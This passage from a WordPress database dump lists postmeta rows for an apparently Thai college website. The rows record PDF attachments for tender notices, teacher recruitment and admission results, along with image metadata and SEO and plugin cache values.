(10601, 4769, '_wp_attached_file', '2018/12/ประกวดราคาชุดทดลองและเครื่องมือวิเคราะห์ไฟฟ้าและอิเล็กทรอนิกส์ยานยนต์.pdf'),
(10605, 4768, '_hide_featured', NULL),
(10606, 4768, '_yoast_wpseo_content_score', '60'),
(10607, 4768, '_yoast_wpseo_primary_category', '3'),
(10608, 4768, '_wpas_done_all', '1'),
(10609, 4768, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575466606;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4803;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:4675;}}}}'),
(10610, 4765, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575706012;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4934;}i:1;a:1:{s:2:\"id\";i:4887;}i:2;a:1:{s:2:\"id\";i:4160;}}}}'),
(10611, 4773, '_wp_attached_file', '2018/12/แผนปฏิบัติราชการ-ประจำปีงบประมาณ62-2.pdf'),
(10612, 4774, '_wp_attached_file', '2018/12/รูปเล่มแผนพัฒนาสถานศึกษา-2562-2566-compressed-1.pdf'),
(10613, 1676, '_yoast_wpseo_content_score', '60'),
(10614, 1688, '_yoast_wpseo_content_score', '90'),
(10615, 4778, '_edit_lock', '1544691322:3'),
(10616, 4778, '_edit_last', '3'),
(10617, 4779, '_wp_attached_file', '2018/12/ประกาศ-รับสมัครสอบคัดเลือกครูอัตราจ้าง-จำนวน-3-อัตรา.pdf'),
(10621, 4778, '_hide_featured', NULL),
(10622, 4778, '_yoast_wpseo_content_score', '60'),
(10623, 4778, '_yoast_wpseo_primary_category', '3'),
(10624, 4778, '_wpas_done_all', '1'),
(10625, 4778, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575190526;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(10626, 4781, '_edit_lock', '1544776252:3'),
(10627, 4781, '_edit_last', '3'),
(10628, 4782, '_wp_attached_file', '2018/12/20181213194220820.pdf'),
(10632, 4781, '_hide_featured', NULL),
(10633, 4781, '_yoast_wpseo_content_score', '60'),
(10634, 4781, '_yoast_wpseo_primary_category', '3'),
(10635, 4781, '_wpas_done_all', '1'),
(10636, 4781, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575535948;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4803;}i:1;a:1:{s:2:\"id\";i:4675;}i:2;a:1:{s:2:\"id\";i:4672;}}}}'),
(10637, 4784, '_wp_attached_file', '2018/12/20181214144730762-edit.pdf'),
(10640, 4786, '_edit_lock', '1545030152:3'),
(10641, 4786, '_edit_last', '3'),
(10642, 4787, '_wp_attached_file', '2018/12/ตารางเวร-เดือนมกราคม-2562.pdf'),
(10646, 4786, '_hide_featured', NULL),
(10647, 4786, '_yoast_wpseo_content_score', '60'),
(10648, 4786, '_yoast_wpseo_primary_category', '3'),
(10649, 4786, '_wpas_done_all', '1'),
(10650, 4786, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575408476;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5361;}i:1;a:1:{s:2:\"id\";i:5124;}i:2;a:1:{s:2:\"id\";i:5277;}}}}'),
(10651, 4789, '_edit_lock', '1545039257:3'),
(10652, 4789, '_edit_last', '3'),
(10653, 4790, '_wp_attached_file', '2018/12/ประกาศ-ประชาพิจารณ์-สาขาวิชาช่างเชื่อม-2562.pdf'),
(10657, 4789, '_hide_featured', NULL),
(10658, 4789, '_yoast_wpseo_content_score', '60'),
(10659, 4789, '_yoast_wpseo_primary_category', '3'),
(10660, 4789, '_wpas_done_all', '1'),
(10661, 4789, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575013022;s:7:\"payload\";a:0:{}}}'),
(10662, 4792, '_edit_lock', '1545363455:3'),
(10663, 4792, '_edit_last', '3'),
(10664, 4793, '_wp_attached_file', '2018/12/ประกาศ-ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม-จำนวน-1-ชุด.pdf'),
(10668, 4792, '_hide_featured', NULL),
(10669, 4792, '_yoast_wpseo_content_score', '60'),
(10670, 4792, '_yoast_wpseo_primary_category', '3'),
(10671, 4792, '_wpas_done_all', '1'),
(10672, 4792, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575417346;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4781;}i:1;a:1:{s:2:\"id\";i:4803;}i:2;a:1:{s:2:\"id\";i:4672;}}}}'),
(10673, 4796, '_wp_attached_file', '2018/12/ปฏิทินปฏิบัติงาน-2561.pdf'),
(10674, 1710, '_yoast_wpseo_content_score', '60'),
(10676, 4800, '_edit_lock', '1545279668:3'),
(10677, 4800, '_edit_last', '3'),
(10678, 4801, '_wp_attached_file', '2018/12/ครุภัณฑ์ห้องเรียนปฏิบัติการทางภาษาเคลื่.pdf'),
(10682, 4800, '_hide_featured', NULL),
(10683, 4800, '_yoast_wpseo_content_score', '60'),
(10684, 4800, '_yoast_wpseo_primary_category', '3'),
(10685, 4800, '_wpas_done_all', '1'),
(10686, 4803, '_edit_lock', '1545280075:3'),
(10687, 4803, '_edit_last', '3'),
(10688, 4804, '_wp_attached_file', '2018/12/ผู้ชนะการเสนอราคาการประกวดราคา.pdf'),
(10692, 4803, '_hide_featured', NULL),
(10693, 4803, '_yoast_wpseo_content_score', '60'),
(10694, 4803, '_yoast_wpseo_primary_category', '3'),
(10695, 4803, '_wpas_done_all', '1'),
(10696, 4803, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575631114;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4768;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:4675;}}}}'),
(10697, 4800, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575307930;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5680;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:5952;}}}}'),
(10702, 4809, '_wp_attached_file', '2018/12/20-12-2561-15-12-37.png'),
(10703, 4809, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1004;s:6:\"height\";i:669;s:4:\"file\";s:31:\"2018/12/20-12-2561-15-12-37.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"20-12-2561-15-12-37-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"20-12-2561-15-12-37-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"20-12-2561-15-12-37-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"20-12-2561-15-12-37-400x267.png\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10704, 4810, '_wp_attached_file', '2018/12/20-12-2561-15-12-57.png'),
(10705, 4810, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1006;s:6:\"height\";i:330;s:4:\"file\";s:31:\"2018/12/20-12-2561-15-12-57.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"20-12-2561-15-12-57-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"20-12-2561-15-12-57-300x98.png\";s:5:\"width\";i:300;s:6:\"height\";i:98;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"20-12-2561-15-12-57-768x252.png\";s:5:\"width\";i:768;s:6:\"height\";i:252;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"20-12-2561-15-12-57-400x131.png\";s:5:\"width\";i:400;s:6:\"height\";i:131;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10706, 3235, '_yoast_wpseo_content_score', '30'),
(10707, 4813, '_wp_attached_file', '2018/12/ประกาศ-ประกวดราคาซื้อครุภัณฑ์ชุดฝึกหุ่นยนต์อุตสาหกรรม-แก้ไข.pdf'),
(10712, 4815, '_wp_attached_file', '2018/12/7-3-2561-13-11-03.jpg'),
(10713, 4815, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:193;s:6:\"height\";i:239;s:4:\"file\";s:29:\"2018/12/7-3-2561-13-11-03.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-3-2561-13-11-03-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10714, 4816, '_wp_attached_file', '2018/12/Picture1-1.png'),
(10715, 4816, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:907;s:6:\"height\";i:265;s:4:\"file\";s:22:\"2018/12/Picture1-1.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Picture1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Picture1-1-300x88.png\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Picture1-1-768x224.png\";s:5:\"width\";i:768;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Picture1-1-400x117.png\";s:5:\"width\";i:400;s:6:\"height\";i:117;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10716, 4820, '_wp_attached_file', '2018/12/24-12-2561-15-26-33.png'),
(10717, 4820, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:202;s:6:\"height\";i:249;s:4:\"file\";s:31:\"2018/12/24-12-2561-15-26-33.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"24-12-2561-15-26-33-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10718, 4821, '_wp_attached_file', '2018/12/Picture2.png'),
(10719, 4821, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:907;s:6:\"height\";i:264;s:4:\"file\";s:20:\"2018/12/Picture2.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Picture2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Picture2-300x87.png\";s:5:\"width\";i:300;s:6:\"height\";i:87;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Picture2-768x224.png\";s:5:\"width\";i:768;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"Picture2-400x116.png\";s:5:\"width\";i:400;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10720, 1541, '_yoast_wpseo_content_score', '30'),
(10721, 4824, '_wp_attached_file', '2018/12/Picture4.png'),
(10722, 4824, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:907;s:6:\"height\";i:264;s:4:\"file\";s:20:\"2018/12/Picture4.png\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"Picture4-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"Picture4-300x87.png\";s:5:\"width\";i:300;s:6:\"height\";i:87;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"Picture4-768x224.png\";s:5:\"width\";i:768;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"Picture4-400x116.png\";s:5:\"width\";i:400;s:6:\"height\";i:116;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10723, 4826, '_edit_lock', '1546848281:3'),
(10724, 4826, '_edit_last', '3'),
(10725, 4827, '_wp_attached_file', '2018/12/ประกาศ-ผลการคัดเลือกโควตา-ภายใน.pdf'),
(10730, 4826, '_hide_featured', NULL),
(10731, 4826, '_yoast_wpseo_content_score', '90'),
(10732, 4826, '_yoast_wpseo_primary_category', '3'),
(10733, 4826, '_wpas_done_all', '1'),
(10734, 4826, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575717154;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4830;}i:1;a:1:{s:2:\"id\";i:4234;}i:2;a:1:{s:2:\"id\";i:6308;}}}}'),
(10735, 4830, '_edit_lock', '1546848110:3'),
(10736, 4830, '_edit_last', '3'),
(10740, 4830, '_hide_featured', NULL),
(10741, 4830, '_yoast_wpseo_content_score', '90'),
(10742, 4830, '_yoast_wpseo_primary_category', '3'),
(10743, 4830, '_wpas_done_all', '1'),
(10744, 4830, '_jetpack_related_posts_cache', 'a:2:{s:32:\"6294df5f2e8bd16c9ee87a6b9eadb9cc\";a:2:{s:7:\"expires\";i:1575658545;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4826;}i:1;a:1:{s:2:\"id\";i:4234;}i:2;a:1:{s:2:\"id\";i:6308;}}}s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575684277;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4826;}i:1;a:1:{s:2:\"id\";i:4234;}i:2;a:1:{s:2:\"id\";i:6308;}}}}'),
(10745, 4832, '_wp_attached_file', '2018/12/25-12-2561-14-36-29.png'),
(10746, 4832, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1047;s:6:\"height\";i:815;s:4:\"file\";s:31:\"2018/12/25-12-2561-14-36-29.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"25-12-2561-14-36-29-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"25-12-2561-14-36-29-300x234.png\";s:5:\"width\";i:300;s:6:\"height\";i:234;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"25-12-2561-14-36-29-768x598.png\";s:5:\"width\";i:768;s:6:\"height\";i:598;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"25-12-2561-14-36-29-1024x797.png\";s:5:\"width\";i:1024;s:6:\"height\";i:797;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:31:\"25-12-2561-14-36-29-385x300.png\";s:5:\"width\";i:385;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10749, 4835, '_wp_attached_file', '2018/12/ประกาศ-ผลการคัดเลือกโควตา-ภายนอก.pdf.pdf'),
(10752, 4838, '_edit_lock', '1545793044:3'),
(10753, 4838, '_edit_last', '3'),
(10754, 4839, '_wp_attached_file', '2018/12/ประกาศ-รายชื่อบุคคลผู้ผ่านการสอบคัดเลือก-ครูอัตราจ้าง-1-อัตรา.pdf'),
(10758, 4838, '_hide_featured', NULL),
(10759, 4838, '_yoast_wpseo_content_score', '60'),
(10760, 4838, '_yoast_wpseo_primary_category', '3'),
(10761, 4838, '_wpas_done_all', '1'),
(10762, 4838, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575703809;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(10765, 4842, '_wp_attached_file', '2018/12/ประกาศ-ผลการคัดเลือกโควตา-ภายนอกedit.pdf.pdf'),
(10779, 4860, '_edit_lock', '1546439340:3'),
(10780, 4860, '_edit_last', '3'),
(10781, 4861, '_wp_attached_file', '2019/01/รายชื่อผู้ชนะการเสนอราคา-โครงการห้องปฏิบัติการทางภาษาเคลื่อนที่-๖-รายการ.pdf'),
(10785, 4860, '_hide_featured', NULL),
(10786, 4860, '_yoast_wpseo_content_score', '60'),
(10787, 4860, '_yoast_wpseo_primary_category', '3'),
(10788, 4860, '_wpas_done_all', '1'),
(10789, 4860, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575553333;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5680;}i:1;a:1:{s:2:\"id\";i:4781;}i:2;a:1:{s:2:\"id\";i:5952;}}}}'),
(10790, 4863, '_edit_lock', '1546827760:3'),
(10791, 4863, '_edit_last', '3'),
(10792, 4864, '_wp_attached_file', '2019/01/47432787_722752978100893_5649355309756448768_o.jpg'),
(10793, 4864, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1616;s:6:\"height\";i:1080;s:4:\"file\";s:58:\"2019/01/47432787_722752978100893_5649355309756448768_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47432787_722752978100893_5649355309756448768_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47432787_722752978100893_5649355309756448768_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47432787_722752978100893_5649355309756448768_o-768x513.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:513;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"47432787_722752978100893_5649355309756448768_o-1024x684.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:684;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47432787_722752978100893_5649355309756448768_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10794, 4863, '_thumbnail_id', '4864'),
(10798, 4863, '_hide_featured', NULL),
(10799, 4863, '_yoast_wpseo_content_score', '30'),
(10800, 4863, '_yoast_wpseo_primary_category', '31'),
(10801, 4863, '_wpas_done_all', '1'),
(10802, 4866, '_edit_lock', '1546828210:3'),
(10803, 4866, '_edit_last', '3'),
(10804, 4867, '_wp_attached_file', '2019/01/47792602_722829534759904_1779651623589511168_o.jpg'),
(10805, 4867, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:58:\"2019/01/47792602_722829534759904_1779651623589511168_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"47792602_722829534759904_1779651623589511168_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"47792602_722829534759904_1779651623589511168_o-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"47792602_722829534759904_1779651623589511168_o-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"47792602_722829534759904_1779651623589511168_o-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"47792602_722829534759904_1779651623589511168_o-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10806, 4866, '_thumbnail_id', '4867'),
(10810, 4866, '_hide_featured', NULL),
(10811, 4866, '_yoast_wpseo_content_score', '30'),
(10812, 4866, '_yoast_wpseo_primary_category', '31'),
(10813, 4866, '_wpas_done_all', '1'),
(10814, 4869, '_edit_lock', '1546828566:3'),
(10815, 4869, '_edit_last', '3'),
(10816, 4870, '_wp_attached_file', '2019/01/48184523_2085373554816171_2386877565936599040_n.jpg'),
(10817, 4870, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:59:\"2019/01/48184523_2085373554816171_2386877565936599040_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"48184523_2085373554816171_2386877565936599040_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"48184523_2085373554816171_2386877565936599040_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"48184523_2085373554816171_2386877565936599040_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"48184523_2085373554816171_2386877565936599040_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(10818, 4869, '_thumbnail_id', '4870'),
(10822, 4869, '_hide_featured', NULL),
(10823, 4869, '_yoast_wpseo_content_score', '30'),
(10824, 4869, '_yoast_wpseo_primary_category', '31'),
(10825, 4869, '_wpas_done_all', '1'),
(10826, 4872, '_edit_lock', '1546829525:3'),
(10827, 4872, '_edit_last', '3'),
(10828, 4873, '_wp_attached_file', '2019/01/48281739_724167731292751_3277769648459743232_o.jpg'),
